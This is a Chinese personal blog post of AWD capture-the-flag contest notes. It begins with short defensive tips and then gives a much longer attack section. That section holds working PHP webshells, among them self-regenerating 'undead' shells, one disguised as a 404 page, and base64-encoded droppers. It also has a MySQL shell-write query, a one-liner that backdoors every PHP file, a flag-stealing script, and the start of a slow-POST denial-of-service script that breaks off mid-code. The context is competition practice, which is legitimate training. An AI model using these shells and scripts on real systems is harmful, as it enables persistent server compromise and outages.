<!DOCTYPE html>


<html lang="zh-CN">
  

    <head>
      <meta charset="utf-8" />
        
      <meta name="description" content="本网站是个人兴趣爱好，总结分享经验，记录生活点滴的平台，希望在以后的学习旅途中，走出自己的风景。" />
      
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>awd总结 |  n0rt6&#39;s blog</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.jpg" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<!--点击爱心-->
<script type="text/javascript" src="\js\clickLove.js"></script>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-awd总结"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  awd总结
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2023/07/22/awd%E6%80%BB%E7%BB%93/" class="article-date">
  <time datetime="2023-07-22T05:42:44.000Z" itemprop="datePublished">2023-07-22</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E7%9F%A5%E8%AF%86%E7%82%B9/">知识点</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.2k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">6 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <meta name="referrer" content="no-referrer"/>

<h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h2><h3 id="备份源码"><a href="#备份源码" class="headerlink" title="备份源码"></a>备份源码</h3><blockquote>
<p>压缩命令<br>tar -zcvf <a target="_blank" rel="noopener" href="http://www.tar.gz/">www.tar.gz</a> &#x2F;var&#x2F;www&#x2F;*</p>
</blockquote>
<blockquote>
<p>解压命令<br>tar -zxvf <a target="_blank" rel="noopener" href="http://www.tar.gz/">www.tar.gz</a><br>或者<br>tar -zcf &#x2F;tmp&#x2F;name.tar.gz &#x2F;path&#x2F;web<br>tar -zcf &#x2F;tmp&#x2F;name.tar.gz &#x2F;var&#x2F;www&#x2F;html</p>
</blockquote>
<h3 id="批量加waf"><a href="#批量加waf" class="headerlink" title="批量加waf"></a>批量加waf</h3><p># 批量加waf &#x2F;var&#x2F;www&#x2F;html&#x2F; 目录下每个 php 文件前加上 <?php require_once "/tmp/waf.php";?></p>
<blockquote>
<p>find &#x2F;var&#x2F;www&#x2F;html&#x2F; -path &#x2F;var&#x2F;www&#x2F;html&#x2F;513666 -prune -o  -type f -name ‘*.php’|xargs  sed -i ‘1i<?php require_once "/tmp/waf.php";?>‘</p>
</blockquote>
<h3 id="克制不死马"><a href="#克制不死马" class="headerlink" title="克制不死马"></a>克制不死马</h3><p>1.ps aux|grep shell.php 找到pid后杀掉进程就可以，你删掉脚本是起不了作用的，因为php执行的时候已经把脚本读进去解释成opcode运行了</p>
<p>2.重启php等web服务(root权限)</p>
<p>3.用一个ignore_user_abort(true)脚本，一直竞争写入（断断续续）。usleep要低于对方不死马设置的值。</p>
<p>4.创建一个和不死马生成的马一样名字的文件夹。</p>
<p>5.<code>pkill -u www-data</code></p>
<p>6.使用条件竞争的方式，不断循环创建和不死马同名的文件和文件夹，在此次比赛中使用此方式克制<br> 了不死马。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
<span class="token assign-left variable">dire</span><span class="token operator">=</span><span class="token string">"/var/www/html/.base.php/"</span>
<span class="token assign-left variable">file</span><span class="token operator">=</span><span class="token string">"/var/www/html/.base.php"</span>
<span class="token function">rm</span> <span class="token parameter variable">-rf</span> <span class="token variable">$file</span>
<span class="token function">mkdir</span> <span class="token variable">$dire</span>
./xx.sh<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="删除指定文件"><a href="#删除指定文件" class="headerlink" title="删除指定文件"></a>删除指定文件</h3><blockquote>
<p>find &#x2F;var&#x2F;www&#x2F;html -name “1.php” -delete</p>
</blockquote>
<h3 id="Shell监控新增文件"><a href="#Shell监控新增文件" class="headerlink" title="Shell监控新增文件"></a>Shell监控新增文件</h3><p>创建文件的时候更改文件创建时间熟悉可能监测不到。</p>
<p>运行命令：<code>sh sh.sh</code></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
<span class="token keyword">while</span> <span class="token boolean">true</span>
<span class="token keyword">do</span>
    <span class="token function">find</span> /app/ <span class="token parameter variable">-cmin</span> <span class="token parameter variable">-60</span> <span class="token parameter variable">-type</span> f <span class="token operator">|</span> <span class="token function">xargs</span> <span class="token function">rm</span> <span class="token parameter variable">-rf</span>
    <span class="token function">sleep</span> <span class="token number">1</span>
<span class="token keyword">done</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h2><h3 id="mysql写入木马"><a href="#mysql写入木马" class="headerlink" title="mysql写入木马"></a>mysql写入木马</h3><p><code>select &quot;&lt;?php eval($_POST[&#39;cmd&#39;]);?&gt;&quot; into outfile &quot;D:\\phpstudy_pro\\WWW\\shell.php&quot;</code></p>
<h3 id="mysql读取文件"><a href="#mysql读取文件" class="headerlink" title="mysql读取文件"></a>mysql读取文件</h3><pre class="line-numbers language-none"><code class="language-none">select load_file(&quot;E:\\flag.txt&quot;);<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="1-简单的拿flag脚本-在本地执行"><a href="#1-简单的拿flag脚本-在本地执行" class="headerlink" title="1.简单的拿flag脚本(在本地执行)"></a>1.简单的拿flag脚本(在本地执行)</h3><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests
url<span class="token operator">=</span><span class="token string">'http://10a6eb1a-ee99-4562-8d4d-cefa0de4c770.challenge.ctf.show/1.php'</span><span class="token comment">#记得改成要攻击的ip</span>
payload<span class="token operator">=</span><span class="token punctuation">&#123;</span>
    <span class="token string">'45'</span><span class="token punctuation">:</span><span class="token string">'system(\'cat flag.php\');'</span>
<span class="token punctuation">&#125;</span>
r<span class="token operator">=</span>requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">,</span>payload<span class="token punctuation">,</span>timeout<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">)</span>
r<span class="token punctuation">.</span>encoding<span class="token operator">=</span>r<span class="token punctuation">.</span>apparent_encoding
<span class="token keyword">print</span><span class="token punctuation">(</span>r<span class="token punctuation">.</span>text<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以结合上面一句话木马使用</p>
<p>我们只要把命令改成读取flag的命令，我们就能为所欲为了。</p>
<h3 id="2-隐藏版不死马（1）"><a href="#2-隐藏版不死马（1）" class="headerlink" title="2.隐藏版不死马（1）"></a>2.隐藏版不死马（1）</h3><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token function">ignore_user_abort</span><span class="token punctuation">(</span><span class="token constant boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">set_time_limit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">unlink</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'.git.php'</span><span class="token punctuation">;</span>
<span class="token variable">$code</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'&lt;?php @eval($_POST[\'ctf\']) ?>'</span><span class="token punctuation">;</span>
<span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span><span class="token variable">$code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'touch -m -d "2018-12-01 09:10:12" .git.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">usleep</span><span class="token punctuation">(</span><span class="token number">10</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="不死马2"><a href="#不死马2" class="headerlink" title="不死马2"></a>不死马2</h3><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
  <span class="token function">ignore_user_abort</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//关掉浏览器，PHP脚本也可以继续执行.</span>
  <span class="token function">set_time_limit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//通过set_time_limit(0)可以让程序无限制的执行下去</span>
  <span class="token variable">$interval</span> <span class="token operator">=</span> <span class="token number">5</span><span class="token punctuation">;</span> <span class="token comment">// 每隔*秒运行</span>
<span class="token keyword">do</span> <span class="token punctuation">&#123;</span>
  <span class="token variable">$filename</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'.123.php'</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">file_exists</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">echo</span> <span class="token string double-quoted-string">"好嗨油！！"</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
  <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token function">fopen</span><span class="token punctuation">(</span><span class="token string double-quoted-string">".123.php"</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"w"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$txt</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'&lt;?php if(md5($_POST["ctf"])=="2c3b3b52eb833ba66134aa1b3970b391")&#123;@eval($_POST[a]);&#125; ?>\n'</span><span class="token punctuation">;</span>
  <span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span> <span class="token variable">$txt</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
  <span class="token function">sleep</span><span class="token punctuation">(</span><span class="token variable">$interval</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token constant boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
    
2c3b3b52eb833ba66134aa1b3970b391解密为ag@ctf<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="不死马3"><a href="#不死马3" class="headerlink" title="不死马3"></a>不死马3</h3><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token function">ignore_user_abort</span><span class="token punctuation">(</span><span class="token constant boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">set_time_limit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">unlink</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'.git.php'</span><span class="token punctuation">;</span>
<span class="token variable">$code</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'&lt;?php if(md5($_POST["ctf"])=="2c3b3b52eb833ba66134aa1b3970b391")&#123;@eval($_POST[a]);&#125; ?>'</span><span class="token punctuation">;</span>
<span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span><span class="token variable">$code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">usleep</span><span class="token punctuation">(</span><span class="token number">5000</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span>
    
2c3b3b52eb833ba66134aa1b3970b391解密为ag@ctf<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="不死马4（404）"><a href="#不死马4（404）" class="headerlink" title="不死马4（404）"></a>不死马4（404）</h3><pre class="line-numbers language-php+HTML" data-language="php+HTML"><code class="language-php+HTML">&lt;!DOCTYPE HTML PUBLIC &quot;-&#x2F;&#x2F;IETF&#x2F;&#x2F;DTD HTML 2.0&#x2F;&#x2F;EN&quot;&gt;
&lt;html&gt;&lt;head&gt;
&lt;title&gt;404 Not Found&lt;&#x2F;title&gt;
&lt;&#x2F;head&gt;&lt;body&gt;
&lt;h1&gt;Not Found&lt;&#x2F;h1&gt;
&lt;p&gt;The requested URL was not found on this server.&lt;&#x2F;p&gt;
&lt;&#x2F;body&gt;&lt;&#x2F;html&gt;
&lt;?php if(md5($_POST[&quot;ctf&quot;])&#x3D;&#x3D;&quot;2c3b3b52eb833ba66134aa1b3970b391&quot;)&#123;@eval($_POST[a]);&#125; ?&gt;

2c3b3b52eb833ba66134aa1b3970b391解密为ag@ctf
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">&lt;?php
header(&quot;Content-Type:text&#x2F;html;charset&#x3D;utf-8&quot;);
ignore_user_abort(true);
set_time_limit(0);
#unlink(__FILE__);  &#x2F;&#x2F;删除文件自身
$paths&#x3D;&#96;find &#x2F;var&#x2F;www&#x2F;html -type d -writable&#96;;$paths&#x3D;explode(&quot;\n&quot;,$paths);array_pop($paths);
$url &#x3D; $_REQUEST[&quot;url&quot;];
$pass &#x3D; &quot;2c3b3b52eb833ba66134aa1b3970b391&quot;;
$filename &#x3D; $_REQUEST[&quot;filename&quot;];
echo &quot;&lt;!DOCTYPE HTML PUBLIC &#39;-&#x2F;&#x2F;IETF&#x2F;&#x2F;DTD HTML 2.0&#x2F;&#x2F;EN&#39;&gt;
&lt;html&gt;&lt;head&gt;
&lt;title&gt;404 Not Found&lt;&#x2F;title&gt;
&lt;&#x2F;head&gt;&lt;body&gt;
&lt;h1&gt;Not Found&lt;&#x2F;h1&gt;
&lt;p&gt;The requested URL was not found on this server.&lt;&#x2F;p&gt;
&lt;&#x2F;body&gt;&lt;&#x2F;html&gt;\n&quot;;


function self()&#123;
    $self&#x3D;substr($_SERVER[&#39;PHP_SELF&#39;],strrpos($_SERVER[&#39;PHP_SELF&#39;],&#39;&#x2F;&#39;)+1);
    return $self;  

&#125;


if($_REQUEST[&quot;m&quot;]&#x3D;&#x3D;&quot;czy&quot;)&#123;

        if(md5($_REQUEST[&quot;pass&quot;]) &#x3D;&#x3D; $pass)&#123;
            echo file_get_contents(&#39;.&#x2F;flag&#39;);
            eval($_REQUEST[&#39;A&#39;]);
        &#125;

&#125;
&#x2F;*
if(&quot;1&quot;!&#x3D;&quot;2&quot;)&#123;
        #while(1)&#123;
        if(count($paths)!&#x3D;&#x3D;0)
        &#123;
                foreach ($paths as $path) &#123;

                        @file_put_contents($path.&quot;&#x2F;.config.php&quot;,file_get_contents(self()));
                        @file_put_contents($path.&quot;&#x2F;-config.php&quot;,file_get_contents(self()));

                &#125;
        &#125;
&#125;
#&#125;
*&#x2F;
?&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>payload—&gt;POST</p>
<p><strong>m&#x3D;czy&amp;pass&#x3D;ag@ctf</strong></p>
<p>这个也需要在找到对方文件上传漏洞后要上传的php文件。然后在对方的网站上访问该文件后就生成了不死马</p>
<h3 id="base64加密的一句话木马"><a href="#base64加密的一句话木马" class="headerlink" title="base64加密的一句话木马"></a>base64加密的一句话木马</h3><blockquote>
<p>system(‘echo PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2N0ZiddKTsgPz4&#x3D;|base64 -d&gt;&gt;.513.php’);</p>
<p>payload:post</p>
<p>ctf&#x3D;***</p>
</blockquote>
<h3 id="每一个PHP文件加入木马"><a href="#每一个PHP文件加入木马" class="headerlink" title="每一个PHP文件加入木马"></a>每一个PHP文件加入木马</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">find</span> /var/www/html/ <span class="token parameter variable">-path</span> /var/www/html/513666 <span class="token parameter variable">-prune</span> <span class="token parameter variable">-o</span>  <span class="token parameter variable">-type</span> f <span class="token parameter variable">-name</span> <span class="token string">'*.php'</span><span class="token operator">|</span><span class="token function">xargs</span>  <span class="token function">sed</span> <span class="token parameter variable">-i</span> <span class="token string">'1i&lt;?php eval(\$_POST[czy]);?>'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h2 id=""><a href="#" class="headerlink" title=""></a></h2><h3 id="加密隐藏不死马"><a href="#加密隐藏不死马" class="headerlink" title="加密隐藏不死马"></a>加密隐藏不死马</h3><blockquote>
<p>PD9waHAKaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CiAgICBzZXRfdGltZV9saW1pdCgwKTsKICAgIEB1bmxpbmsoX19GSUxFX18pOwogICAgJGZpbGUgPSAnLmN6eS5waHAnOwogICAgJGNvZGUgPSAnPD9waHAgaWYobWQ1KCRfR0VUWyJjenkiXSk9PSIyYzNiM2I1MmViODMzYmE2NjEzNGFhMWIzOTcwYjM5MSIpe0BldmFsKCRfUE9TVFsiY3p5Il0pO30&#x2F;Pic7CiAgICB3aGlsZSAoMSl7CiAgICAgICAgZmlsZV9wdXRfY29udGVudHMoJGZpbGUsJGNvZGUpOwogICAgICAgIHVzbGVlcCg1MDApOwogICAgfQo&#x2F;Pg&#x3D;&#x3D;</p>
</blockquote>
<p>命令执行：</p>
<blockquote>
<p>system(‘echo PD9waHAKaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CiAgICBzZXRfdGltZV9saW1pdCgwKTsKICAgIEB1bmxpbmsoX19GSUxFX18pOwogICAgJGZpbGUgPSAnLmN6eS5waHAnOwogICAgJGNvZGUgPSAnPD9waHAgaWYobWQ1KCRfR0VUWyJjenkiXSk9PSIyYzNiM2I1MmViODMzYmE2NjEzNGFhMWIzOTcwYjM5MSIpe0BldmFsKCRfUE9TVFsiY3p5Il0pO30&#x2F;Pic7CiAgICB3aGlsZSAoMSl7CiAgICAgICAgZmlsZV9wdXRfY29udGVudHMoJGZpbGUsJGNvZGUpOwogICAgICAgIHVzbGVlcCg1MDApOwogICAgfQo&#x2F;Pg&#x3D;&#x3D;|base64 -d &gt;.czy.php’);</p>
</blockquote>
<p>明文：</p>
<blockquote>
<?php
ignore_user_abort(true);
set_time_limit(0);
@unlink(__FILE__);
$file = '.czy.php';
$code = '<?php if(md5($_GET["czy"])=="2c3b3b52eb833ba66134aa1b3970b391"){@eval($_POST["czy"]);}?><p>‘;<br>while (1){<br>  file_put_contents($file,$code);<br>  usleep(500);<br>}<br>?&gt;</p>
<p>payload：GET    .czy.php&#x2F;?czy&#x3D;ag@ctf</p>
<p>​				POST    czy&#x3D;phpinfo();</p>
</blockquote>
<h2 id="总结一下线下赛的防护工作中常用的一些命令"><a href="#总结一下线下赛的防护工作中常用的一些命令" class="headerlink" title="总结一下线下赛的防护工作中常用的一些命令"></a>总结一下线下赛的防护工作中常用的一些命令</h2><pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript">ssh <span class="token operator">&lt;</span><span class="token operator">-</span>p 端口<span class="token operator">></span> username@ip
scp 文件路径  username@ip<span class="token operator">:</span>存放路径
cat <span class="token operator">/</span>root<span class="token operator">/</span><span class="token punctuation">.</span>bash_history
#显示最近登录的<span class="token number">5</span>个帐号
last <span class="token operator">-</span>n <span class="token number">5</span><span class="token operator">|</span>awk <span class="token string">'&#123;print $1&#125;'</span>
#显示<span class="token operator">/</span>etc<span class="token operator">/</span>passwd的账户
cat <span class="token operator">/</span>etc<span class="token operator">/</span>passwd<span class="token operator">|</span>awk <span class="token operator">-</span><span class="token constant">F</span> <span class="token string">':'</span> <span class="token string">'&#123;print $1&#125;'</span>
#查看<span class="token constant">UID</span>为<span class="token number">0</span>的帐号
awk <span class="token operator">-</span><span class="token constant">F</span><span class="token operator">:</span> <span class="token string">'&#123;if($3==0)print $1&#125;'</span> <span class="token operator">/</span>etc<span class="token operator">/</span>passwd
#查找<span class="token number">777</span>的权限的文件
find <span class="token punctuation">.</span> <span class="token operator">-</span>name <span class="token string">"*.php"</span> <span class="token operator">-</span>perm <span class="token number">4777</span>
#查找<span class="token number">24</span>小时内被修改的<span class="token constant">PHP</span>文件
find <span class="token punctuation">.</span><span class="token operator">/</span> <span class="token operator">-</span>mtime <span class="token number">0</span> <span class="token operator">-</span>name <span class="token string">"*.php"</span>
#查看进程
ps aux <span class="token operator">|</span> grep pid或者进程名　　　　
#查看已建立的网络连接及进程
netstat <span class="token operator">-</span>antulp <span class="token operator">|</span> grep <span class="token constant">EST</span>
#查看指定端口被哪个进程占用
lsof <span class="token operator">-</span>i<span class="token operator">:</span>端口号 或者 netstat <span class="token operator">-</span>tunlp<span class="token operator">|</span>grep 端口号
#结束进程命令
kill <span class="token constant">PID</span>
killall <span class="token operator">&lt;</span>进程名<span class="token operator">></span>
pkill <span class="token operator">&lt;</span>进程名<span class="token operator">></span>
pkill <span class="token operator">-</span>u用户名
#封杀某个<span class="token constant">IP</span>或者ip段
iptables <span class="token operator">-</span><span class="token constant">I</span> <span class="token constant">INPUT</span> <span class="token operator">-</span>s source_ip<span class="token punctuation">[</span><span class="token operator">/</span>mask<span class="token punctuation">]</span> <span class="token operator">-</span>j <span class="token constant">DROP</span>
#禁止从某个主机ssh远程访问登陆到本机
iptable <span class="token operator">-</span>t filter <span class="token operator">-</span><span class="token constant">A</span> <span class="token constant">INPUT</span> <span class="token operator">-</span>s source_ip<span class="token punctuation">[</span><span class="token operator">/</span>mask<span class="token punctuation">]</span> <span class="token operator">-</span>p tcp <span class="token operator">--</span>dport <span class="token number">22</span> <span class="token operator">-</span>j <span class="token constant">DROP</span>
#备份mysql数据库
mysqldump <span class="token operator">-</span>u 用户名 <span class="token operator">-</span>p 密码 数据库名 <span class="token operator">></span> bak<span class="token punctuation">.</span>sql
mysqldump <span class="token operator">--</span>all<span class="token operator">-</span>databases <span class="token operator">></span> bak<span class="token punctuation">.</span>sql
#还原mysql数据库
mysql <span class="token operator">-</span>u 用户名 <span class="token operator">-</span>p 密码 数据库名 <span class="token operator">&lt;</span> bak<span class="token punctuation">.</span>sql
#定时任务，在固定的时间间隔执行指定的系统指令或shell script
crontab <span class="token punctuation">[</span><span class="token operator">-</span>u user<span class="token punctuation">]</span> file_name
crontab <span class="token punctuation">[</span><span class="token operator">-</span>u user<span class="token punctuation">]</span> <span class="token punctuation">[</span><span class="token operator">-</span>e <span class="token operator">|</span><span class="token operator">-</span>l<span class="token operator">|</span> <span class="token operator">-</span>r<span class="token punctuation">]</span>
#检测所有的tcp连接数量及状态
netstat <span class="token operator">-</span>ant<span class="token operator">|</span>awk<span class="token operator">|</span>grep<span class="token operator">|</span>sed <span class="token operator">-</span>e <span class="token operator">-</span>e<span class="token operator">|</span>sort<span class="token operator">|</span>uniq <span class="token operator">-</span>c<span class="token operator">|</span>sort <span class="token operator">-</span>rn
#查看页面访问排名前十的<span class="token constant">IP</span>
cat <span class="token operator">/</span><span class="token keyword">var</span><span class="token operator">/</span>log<span class="token operator">/</span>apache2<span class="token operator">/</span>access<span class="token punctuation">.</span>log<span class="token operator">|</span>cut <span class="token operator">-</span>f1 <span class="token operator">-</span>d<span class="token operator">|</span>sort<span class="token operator">|</span>uniq <span class="token operator">-</span>c<span class="token operator">|</span>sort <span class="token operator">-</span>k  <span class="token operator">-</span>r<span class="token operator">|</span>head <span class="token operator">-</span>　　
#查看页面访问排名前十的<span class="token constant">URL</span>
cat <span class="token operator">/</span><span class="token keyword">var</span><span class="token operator">/</span>log<span class="token operator">/</span>apache2<span class="token operator">/</span>access<span class="token punctuation">.</span>log<span class="token operator">|</span>cut <span class="token operator">-</span>f4 <span class="token operator">-</span>d<span class="token operator">|</span>sort<span class="token operator">|</span>uniq <span class="token operator">-</span>c<span class="token operator">|</span>sort <span class="token operator">-</span>k  <span class="token operator">-</span>r<span class="token operator">|</span>head <span class="token operator">-</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="DOS脚本"><a href="#DOS脚本" class="headerlink" title="DOS脚本"></a>DOS脚本</h2><blockquote>
<p>这种情况便是不想玩了，玩不下去了被攻陷了，可以试着给别人一棒子</p>
</blockquote>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> socket
<span class="token keyword">import</span> time
<span class="token keyword">import</span> threading

<span class="token builtin">max</span><span class="token operator">=</span><span class="token number">90000000</span>
port<span class="token operator">=</span><span class="token number">80</span>                 <span class="token comment">#端口</span>
host<span class="token operator">=</span><span class="token string">"192.168.92.154"</span>   <span class="token comment">#IP</span>
page<span class="token operator">=</span><span class="token string">"/index.php"</span>

bag<span class="token operator">=</span><span class="token punctuation">(</span><span class="token string">"POST %s HTTP/1.1\r\n"</span>
    <span class="token string">"host: %s\r\n"</span>
    <span class="token string">"Content-Length: 1000000000\r\n"</span>
    <span class="token string">"Cookie: 1998\r\n"</span>
    <span class="token string">"\r\n"</span> <span class="token operator">%</span> <span class="token punctuation">(</span>page<span class="token punctuation">,</span>host<span class="token punctuation">)</span><span class="token punctuation">)</span>

socks <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span>

<span class="token keyword">def</span> <span class="token function">connect</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">global</span> socks
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token builtin">max</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        s <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span>socket<span class="token punctuation">.</span>AF_INET<span class="token punctuation">,</span>socket<span class="token punctuation">.</span>SOCK_STREAM<span class="token punctuation">)</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            s<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token punctuation">(</span>host<span class="token punctuation">,</span>port<span class="token punctuation">)</span><span class="token punctuation">)</span>
            s<span class="token punctuation">.</span>send<span class="token punctuation">(</span>bag<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">"utf-8"</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
            socks<span class="token punctuation">.</span>append<span class="token punctuation">(</span>s<span class="token punctuation">)</span>
        <span class="token keyword">except</span> Exception <span class="token keyword">as</span> ex<span class="token punctuation">:</span>
